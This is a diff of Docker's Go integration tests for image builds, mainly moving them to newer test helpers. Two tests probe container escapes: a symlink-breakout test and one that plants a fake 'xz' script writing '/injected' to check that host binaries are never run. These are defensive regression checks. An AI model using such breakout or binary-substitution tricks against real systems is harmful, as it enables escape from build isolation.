 	expected := `{"License":"GPL","Vendor":"Acme"}`
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		LABEL Vendor=Acme
-                LABEL License GPL`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+                LABEL License GPL`))
 	res := inspectFieldJSON(c, name, "Config.Labels")
 	if res != expected {
 		c.Fatalf("Labels %s, expected %s", res, expected)
@@ -4475,221 +3391,214 @@ func (s *DockerSuite) TestBuildLabels(c *check.C) {
 func (s *DockerSuite) TestBuildLabelsCache(c *check.C) {
 	name := "testbuildlabelcache"
 
-	id1, err := buildImage(name,
-		`FROM busybox
-		LABEL Vendor=Acme`, false)
-	if err != nil {
-		c.Fatalf("Build 1 should have worked: %v", err)
-	}
-
-	id2, err := buildImage(name,
-		`FROM busybox
-		LABEL Vendor=Acme`, true)
-	if err != nil || id1 != id2 {
-		c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		LABEL Vendor=Acme`))
+	id1 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		LABEL Vendor=Acme`))
+	id2 := getIDByName(c, name)
+	if id1 != id2 {
+		c.Fatalf("Build 2 should have worked & used cache(%s,%s)", id1, id2)
 	}
 
-	id2, err = buildImage(name,
-		`FROM busybox
-		LABEL Vendor=Acme1`, true)
-	if err != nil || id1 == id2 {
-		c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		LABEL Vendor=Acme1`))
+	id2 = getIDByName(c, name)
+	if id1 == id2 {
+		c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s)", id1, id2)
 	}
 
-	id2, err = buildImage(name,
-		`FROM busybox
-		LABEL Vendor Acme`, true) // Note: " " and "=" should be same
-	if err != nil || id1 != id2 {
-		c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		LABEL Vendor Acme`))
+	id2 = getIDByName(c, name)
+	if id1 != id2 {
+		c.Fatalf("Build 4 should have worked & used cache(%s,%s)", id1, id2)
 	}
 
 	// Now make sure the cache isn't used by mistake
-	id1, err = buildImage(name,
-		`FROM busybox
-       LABEL f1=b1 f2=b2`, false)
-	if err != nil {
-		c.Fatalf("Build 5 should have worked: %q", err)
-	}
+	buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(`FROM busybox
+       LABEL f1=b1 f2=b2`))
 
-	id2, err = buildImage(name,
-		`FROM busybox
-       LABEL f1="b1 f2=b2"`, true)
-	if err != nil || id1 == id2 {
-		c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err)
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+       LABEL f1=b1 f2=b2`))
+	id2 = getIDByName(c, name)
+	if id1 == id2 {
+		c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s)", id1, id2)
 	}
 
 }
 
+// FIXME(vdemeester) port to docker/cli e2e tests (api tests should test suppressOutput option though)
 func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) {
 	// This test makes sure that -q works correctly when build is successful:
 	// stdout has only the image ID (long image ID) and stderr is empty.
-	var stdout, stderr string
-	var err error
 	outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$")
+	buildFlags := cli.WithFlags("-q")
 
 	tt := []struct {
 		Name      string
-		BuildFunc func(string)
+		BuildFunc func(string) *icmd.Result
 	}{
 		{
 			Name: "quiet_build_stdin_success",
-			BuildFunc: func(name string) {
-				_, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm")
+			BuildFunc: func(name string) *icmd.Result {
+				return buildImage(name, buildFlags, build.WithDockerfile("FROM busybox"))
 			},
 		},
 		{
 			Name: "quiet_build_ctx_success",
-			BuildFunc: func(name string) {
-				ctx, err := fakeContext("FROM busybox", map[string]string{
-					"quiet_build_success_fctx": "test",
-				})
-				if err != nil {
-					c.Fatalf("Failed to create context: %s", err.Error())
-				}
-				defer ctx.Close()
-				_, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, ctx, true, "-q", "--force-rm", "--rm")
+			BuildFunc: func(name string) *icmd.Result {
+				return buildImage(name, buildFlags, build.WithBuildContext(c,
+					build.WithFile("Dockerfile", "FROM busybox"),
+					build.WithFile("quiet_build_success_fctx", "test"),
+				))
 			},
 		},
 		{
 			Name: "quiet_build_git_success",
-			BuildFunc: func(name string) {
-				git, err := newFakeGit("repo", map[string]string{
+			BuildFunc: func(name string) *icmd.Result {
+				git := fakegit.New(c, "repo", map[string]string{
 					"Dockerfile": "FROM busybox",
 				}, true)
-				if err != nil {
-					c.Fatalf("Failed to create the git repo: %s", err.Error())
-				}
-				defer git.Close()
-				_, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm")
-
+				return buildImage(name, buildFlags, build.WithContextPath(git.RepoURL))
 			},
 		},
 	}
 
 	for _, te := range tt {
-		te.BuildFunc(te.Name)
-		if err != nil {
-			c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error())
-		}
-		if outRegexp.Find([]byte(stdout)) == nil {
-			c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, stdout)
+		result := te.BuildFunc(te.Name)
+		result.Assert(c, icmd.Success)
+		if outRegexp.Find([]byte(result.Stdout())) == nil {
+			c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, result.Stdout())
 		}
 
-		if stderr != "" {
-			c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr)
+		if result.Stderr() != "" {
+			c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, result.Stderr())
 		}
 	}
 
 }
 
+// FIXME(vdemeester) migrate to docker/cli tests
 func (s *DockerSuite) TestBuildNotVerboseFailureWithNonExistImage(c *check.C) {
 	// This test makes sure that -q works correctly when build fails by
 	// comparing between the stderr output in quiet mode and in stdout
 	// and stderr output in verbose mode
 	testRequires(c, Network)
 	testName := "quiet_build_not_exists_image"
-	buildCmd := "FROM busybox11"
-	_, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm")
-	_, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm")
-	if verr == nil || qerr == nil {
-		c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName))
-	}
-	if qstderr != vstdout+vstderr {
-		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr))
+	dockerfile := "FROM busybox11"
+	quietResult := buildImage(testName, cli.WithFlags("-q"), build.WithDockerfile(dockerfile))
+	quietResult.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	result := buildImage(testName, build.WithDockerfile(dockerfile))
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	if quietResult.Stderr() != result.Combined() {
+		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, quietResult.Stderr(), result.Combined()))
 	}
 }
 
+// FIXME(vdemeester) migrate to docker/cli tests
 func (s *DockerSuite) TestBuildNotVerboseFailure(c *check.C) {
 	// This test makes sure that -q works correctly when build fails by
 	// comparing between the stderr output in quiet mode and in stdout
 	// and stderr output in verbose mode
-	tt := []struct {
-		TestName  string
-		BuildCmds string
+	testCases := []struct {
+		testName   string
+		dockerfile string
 	}{
 		{"quiet_build_no_from_at_the_beginning", "RUN whoami"},
 		{"quiet_build_unknown_instr", "FROMD busybox"},
 	}
 
-	for _, te := range tt {
-		_, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm")
-		_, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm")
-		if verr == nil || qerr == nil {
-			c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName))
-		}
-		if qstderr != vstdout+vstderr {
-			c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr))
+	for _, tc := range testCases {
+		quietResult := buildImage(tc.testName, cli.WithFlags("-q"), build.WithDockerfile(tc.dockerfile))
+		quietResult.Assert(c, icmd.Expected{
+			ExitCode: 1,
+		})
+		result := buildImage(tc.testName, build.WithDockerfile(tc.dockerfile))
+		result.Assert(c, icmd.Expected{
+			ExitCode: 1,
+		})
+		if quietResult.Stderr() != result.Combined() {
+			c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", tc.testName, quietResult.Stderr(), result.Combined()))
 		}
 	}
 }
 
+// FIXME(vdemeester) migrate to docker/cli tests
 func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) {
 	// This test ensures that when given a wrong URL, stderr in quiet mode and
 	// stderr in verbose mode are identical.
 	// TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout
 	URL := "http://something.invalid"
-	Name := "quiet_build_wrong_remote"
-	_, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL)
-	_, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL)
-	if qerr == nil || verr == nil {
-		c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name))
+	name := "quiet_build_wrong_remote"
+	quietResult := buildImage(name, cli.WithFlags("-q"), build.WithContextPath(URL))
+	quietResult.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+	result := buildImage(name, build.WithContextPath(URL))
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+
+	// An error message should contain name server IP and port, like this:
+	//  "dial tcp: lookup something.invalid on 172.29.128.11:53: no such host"
+	// The IP:port need to be removed in order to not trigger a test failur
+	// when more than one nameserver is configured.
+	// While at it, also strip excessive newlines.
+	normalize := func(msg string) string {
+		return strings.TrimSpace(regexp.MustCompile("[1-9][0-9.]+:[0-9]+").ReplaceAllLiteralString(msg, "<ip:port>"))
 	}
-	if qstderr != vstderr {
-		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr))
+
+	if normalize(quietResult.Stderr()) != normalize(result.Combined()) {
+		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", name, quietResult.Stderr(), result.Combined()))
 	}
 }
 
+// FIXME(vdemeester) migrate to docker/cli tests
 func (s *DockerSuite) TestBuildStderr(c *check.C) {
 	// This test just makes sure that no non-error output goes
 	// to stderr
 	name := "testbuildstderr"
-	_, _, stderr, err := buildImageWithStdoutStderr(name,
-		"FROM busybox\nRUN echo one", true)
-	if err != nil {
-		c.Fatal(err)
+	result := buildImage(name, build.WithDockerfile("FROM busybox\nRUN echo one"))
+	result.Assert(c, icmd.Success)
+
+	// Windows to non-Windows should have a security warning
+	if runtime.GOOS == "windows" && testEnv.OSType != "windows" && !strings.Contains(result.Stdout(), "SECURITY WARNING:") {
+		c.Fatalf("Stdout contains unexpected output: %q", result.Stdout())
 	}
 
-	if runtime.GOOS == "windows" &&
-		daemonPlatform != "windows" {
-		// Windows to non-Windows should have a security warning
-		if !strings.Contains(stderr, "SECURITY WARNING:") {
-			c.Fatalf("Stderr contains unexpected output: %q", stderr)
-		}
-	} else {
-		// Other platform combinations should have no stderr written too
-		if stderr != "" {
-			c.Fatalf("Stderr should have been empty, instead it's: %q", stderr)
-		}
+	// Stderr should always be empty
+	if result.Stderr() != "" {
+		c.Fatalf("Stderr should have been empty, instead it's: %q", result.Stderr())
 	}
 }
 
 func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) {
-	testRequires(c, UnixCli) // test uses chown: not available on windows
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, UnixCli, DaemonIsLinux) // test uses chown: not available on windows
 
 	name := "testbuildchownsinglefile"
 
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 FROM busybox
 COPY test /
 RUN ls -l /test
 RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ]
-`, map[string]string{
-		"test": "test",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+`),
+		fakecontext.WithFiles(map[string]string{
+			"test": "test",
+		}))
 	defer ctx.Close()
 
 	if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil {
 		c.Fatal(err)
 	}
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 }
 
 func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) {
@@ -4733,9 +3642,8 @@ func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) {
 	})
 	w.Close()
 	f.Close()
-	if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil {
-		c.Fatal(err)
-	}
+
+	buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(fakecontext.New(c, ctx)))
 	if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil {
 		c.Fatal("symlink breakout - inject")
 	} else if !os.IsNotExist(err) {
@@ -4749,28 +3657,16 @@ func (s *DockerSuite) TestBuildXZHost(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildxzhost"
 
-	ctx, err := fakeContext(`
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
 FROM busybox
 ADD xz /usr/local/sbin/
 RUN chmod 755 /usr/local/sbin/xz
 ADD test.xz /
-RUN [ ! -e /injected ]`,
-		map[string]string{
-			"test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" +
-				"\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" +
-				"\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21",
-			"xz": "#!/bin/sh\ntouch /injected",
-		})
-
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+RUN [ ! -e /injected ]`),
+		build.WithFile("test.xz", "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00"+"\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd"+"\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21"),
+		build.WithFile("xz", "#!/bin/sh\ntouch /injected"),
+	))
 }
 
 func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) {
@@ -4783,26 +3679,18 @@ func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) {
 		volName  = "/foo"
 	)
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volName = "C:/foo"
 	}
 
-	ctx, err := fakeContext(`
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
 FROM busybox
 COPY content /foo/file
 VOLUME `+volName+`
-CMD cat /foo/file`,
-		map[string]string{
-			"content": expected,
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, false); err != nil {
-		c.Fatal(err)
-	}
+CMD cat /foo/file`),
+		build.WithFile("content", expected),
+	))
 
 	out, _ := dockerCmd(c, "run", "--rm", name)
 	if out != expected {
@@ -4811,220 +3699,78 @@ CMD cat /foo/file`,
 
 }
 
-func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) {
-
-	ctx, err := fakeContext(`FROM busybox
-	RUN echo from Dockerfile`,
-		map[string]string{
-			"Dockerfile":       "FROM busybox\nRUN echo from Dockerfile",
-			"files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile",
-			"files/dFile":      "FROM busybox\nRUN echo from files/dFile",
-			"dFile":            "FROM busybox\nRUN echo from dFile",
-			"files/dFile2":     "FROM busybox\nRUN echo from files/dFile2",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
-	if err != nil {
-		c.Fatalf("Failed to build: %s\n%s", out, err)
-	}
-	if !strings.Contains(out, "from Dockerfile") {
-		c.Fatalf("test1 should have used Dockerfile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".")
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(out, "from files/Dockerfile") {
-		c.Fatalf("test2 should have used files/Dockerfile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".")
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(out, "from files/dFile") {
-		c.Fatalf("test3 should have used files/dFile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".")
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(out, "from dFile") {
-		c.Fatalf("test4 should have used dFile, output:%s", out)
-	}
-
-	dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5")
-	c.Assert(err, check.IsNil)
-	nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile")
-	if _, err = os.Create(nonDockerfileFile); err != nil {
-		c.Fatal(err)
-	}
-	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".")
-
-	if err == nil {
-		c.Fatalf("test5 was supposed to fail to find passwd")
-	}
-
-	if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) {
-		c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected)
-	}
-
-	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..")
-	if err != nil {
-		c.Fatalf("test6 failed: %s", err)
-	}
-	if !strings.Contains(out, "from Dockerfile") {
-		c.Fatalf("test6 should have used root Dockerfile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), "-t", "test7", "..")
-	if err != nil {
-		c.Fatalf("test7 failed: %s", err)
-	}
-	if !strings.Contains(out, "from files/Dockerfile") {
-		c.Fatalf("test7 should have used files Dockerfile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".")
-	if err == nil || !strings.Contains(out, "must be within the build context") {
-		c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err)
-	}
-
-	tmpDir := os.TempDir()
-	out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir)
-	if err != nil {
-		c.Fatalf("test9 - failed: %s", err)
-	}
-	if !strings.Contains(out, "from Dockerfile") {
-		c.Fatalf("test9 should have used root Dockerfile, output:%s", out)
-	}
-
-	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".")
-	if err != nil {
-		c.Fatalf("test10 should have worked: %s", err)
-	}
-	if !strings.Contains(out, "from files/dFile2") {
-		c.Fatalf("test10 should have used files/dFile2, output:%s", out)
-	}
-
-}
-
 func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) {
 	testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows
 	testRequires(c, DaemonIsLinux)
 
-	ctx, err := fakeContext(`FROM busybox
-	RUN echo from dockerfile`,
-		map[string]string{
-			"dockerfile": "FROM busybox\nRUN echo from dockerfile",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
-	if err != nil {
-		c.Fatalf("Failed to build: %s\n%s", out, err)
-	}
-
-	if !strings.Contains(out, "from dockerfile") {
-		c.Fatalf("Missing proper output: %s", out)
-	}
-
-}
-
-func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) {
-	testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows
-	testRequires(c, DaemonIsLinux)
-
-	ctx, err := fakeContext(`FROM busybox
-RUN echo from Dockerfile`,
-		map[string]string{
-			"dockerfile": "FROM busybox\nRUN echo from dockerfile",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
-	if err != nil {
-		c.Fatalf("Failed to build: %s\n%s", out, err)
-	}
-
-	if !strings.Contains(out, "from Dockerfile") {
-		c.Fatalf("Missing proper output: %s", out)
-	}
+	// If Dockerfile is not present, use dockerfile
+	buildImage("test1", build.WithBuildContext(c,
+		build.WithFile("dockerfile", `FROM busybox
+	RUN echo from dockerfile`),
+	)).Assert(c, icmd.Expected{
+		Out: "from dockerfile",
+	})
 
+	// Prefer Dockerfile in place of dockerfile
+	buildImage("test1", build.WithBuildContext(c,
+		build.WithFile("dockerfile", `FROM busybox
+	RUN echo from dockerfile`),
+		build.WithFile("Dockerfile", `FROM busybox
+	RUN echo from Dockerfile`),
+	)).Assert(c, icmd.Expected{
+		Out: "from Dockerfile",
+	})
 }
 
+// FIXME(vdemeester) should migrate to docker/cli tests
 func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) {
-	server, err := fakeStorage(map[string]string{"baz": `FROM busybox
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"baz": `FROM busybox
 RUN echo from baz
 COPY * /tmp/
-RUN find /tmp/`})
-	if err != nil {
-		c.Fatal(err)
-	}
+RUN find /tmp/`}))
 	defer server.Close()
 
-	ctx, err := fakeContext(`FROM busybox
-RUN echo from Dockerfile`,
-		map[string]string{})
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox
+	RUN echo from Dockerfile`))
 	defer ctx.Close()
 
 	// Make sure that -f is ignored and that we don't use the Dockerfile
 	// that's in the current dir
-	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-f", "baz", "-t", "test1", server.URL()+"/baz")
-	if err != nil {
-		c.Fatalf("Failed to build: %s\n%s", out, err)
-	}
+	result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", server.URL()+"/baz"), func(cmd *icmd.Cmd) func() {
+		cmd.Dir = ctx.Dir
+		return nil
+	})
 
-	if !strings.Contains(out, "from baz") ||
-		strings.Contains(out, "/tmp/baz") ||
-		!strings.Contains(out, "/tmp/Dockerfile") {
-		c.Fatalf("Missing proper output: %s", out)
+	if !strings.Contains(result.Combined(), "from baz") ||
+		strings.Contains(result.Combined(), "/tmp/baz") ||
+		!strings.Contains(result.Combined(), "/tmp/Dockerfile") {
+		c.Fatalf("Missing proper output: %s", result.Combined())
 	}
 
 }
 
+// FIXME(vdemeester) should migrate to docker/cli tests
 func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) {
 	testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why
-	ctx, err := fakeContext(`FROM busybox
-RUN echo "from Dockerfile"`,
-		map[string]string{})
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox
+RUN echo "from Dockerfile"`))
 	defer ctx.Close()
 
 	// Make sure that -f is ignored and that we don't use the Dockerfile
 	// that's in the current dir
-	dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-")
-	dockerCommand.Dir = ctx.Dir
-	dockerCommand.Stdin = strings.NewReader(`FROM busybox
+	result := cli.BuildCmd(c, "test1", cli.WithFlags("-f", "baz", "-"), func(cmd *icmd.Cmd) func() {
+		cmd.Dir = ctx.Dir
+		cmd.Stdin = strings.NewReader(`FROM busybox
 RUN echo "from baz"
 COPY * /tmp/
 RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`)
-	out, status, err := runCommandWithOutput(dockerCommand)
-	if err != nil || status != 0 {
-		c.Fatalf("Error building: %s", err)
-	}
+		return nil
+	})
 
-	if !strings.Contains(out, "from baz") ||
-		strings.Contains(out, "/tmp/baz") ||
-		!strings.Contains(out, "/tmp/Dockerfile") {
-		c.Fatalf("Missing proper output: %s", out)
+	if !strings.Contains(result.Combined(), "from baz") ||
+		strings.Contains(result.Combined(), "/tmp/baz") ||
+		!strings.Contains(result.Combined(), "/tmp/Dockerfile") {
+		c.Fatalf("Missing proper output: %s", result.Combined())
 	}
 
 }
@@ -5041,136 +3787,71 @@ func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) {
 	}
 	for idx, fromName := range fromNames {
 		imgName := fmt.Sprintf("%s%d", name, idx)
-		_, err := buildImage(imgName, "FROM "+fromName, true)
-		if err != nil {
-			c.Errorf("Build failed using FROM %s: %s", fromName, err)
-		}
-		deleteImages(imgName)
+		buildImageSuccessfully(c, imgName, build.WithDockerfile("FROM "+fromName))
+		dockerCmd(c, "rmi", imgName)
 	}
 }
 
-func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) {
-	testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2)
-	testRequires(c, DaemonIsLinux)
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestBuildSpaces(c *check.C) {
+	// Test to make sure that leading/trailing spaces on a command
+	// doesn't change the error msg we get
+	name := "testspaces"
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nCOPY\n"))
+	defer ctx.Close()
 
-	name := "testbuilddockerfileoutsidecontext"
-	tmpdir, err := ioutil.TempDir("", name)
-	c.Assert(err, check.IsNil)
-	defer os.RemoveAll(tmpdir)
-	ctx := filepath.Join(tmpdir, "context")
-	if err := os.MkdirAll(ctx, 0755); err != nil {
-		c.Fatal(err)
+	result1 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx))
+	result1.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+
+	ctx.Add("Dockerfile", "FROM busybox\nCOPY    ")
+	result2 := cli.Docker(cli.Build(name), build.WithExternalBuildContext(ctx))
+	result2.Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
+
+	removeLogTimestamps := func(s string) string {
+		return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`)
 	}
-	if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM scratch\nENV X Y"), 0644); err != nil {
-		c.Fatal(err)
-	}
-	wd, err := os.Getwd()
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer os.Chdir(wd)
-	if err := os.Chdir(ctx); err != nil {
-		c.Fatal(err)
-	}
-	if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil {
-		c.Fatal(err)
-	}
-	if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil {
-		c.Fatal(err)
-	}
-	if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil {
-		c.Fatal(err)
-	}
-
-	for _, dockerfilePath := range []string{
-		filepath.Join("..", "outsideDockerfile"),
-		filepath.Join(ctx, "dockerfile1"),
-		filepath.Join(ctx, "dockerfile2"),
-	} {
-		result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".")
-		c.Assert(result, icmd.Matches, icmd.Expected{
-			Err:      "must be within the build context",
-			ExitCode: 1,
-		})
-		deleteImages(name)
-	}
-
-	os.Chdir(tmpdir)
-
-	// Path to Dockerfile should be resolved relative to working directory, not relative to context.
-	// There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail
-	out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx)
-	if err == nil {
-		c.Fatalf("Expected error. Out: %s", out)
-	}
-}
-
-func (s *DockerSuite) TestBuildSpaces(c *check.C) {
-	// Test to make sure that leading/trailing spaces on a command
-	// doesn't change the error msg we get
-	var (
-		err1 error
-		err2 error
-	)
-
-	name := "testspaces"
-	ctx, err := fakeContext("FROM busybox\nCOPY\n",
-		map[string]string{
-			"Dockerfile": "FROM busybox\nCOPY\n",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil {
-		c.Fatal("Build 1 was supposed to fail, but didn't")
-	}
-
-	ctx.Add("Dockerfile", "FROM busybox\nCOPY    ")
-	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
-		c.Fatal("Build 2 was supposed to fail, but didn't")
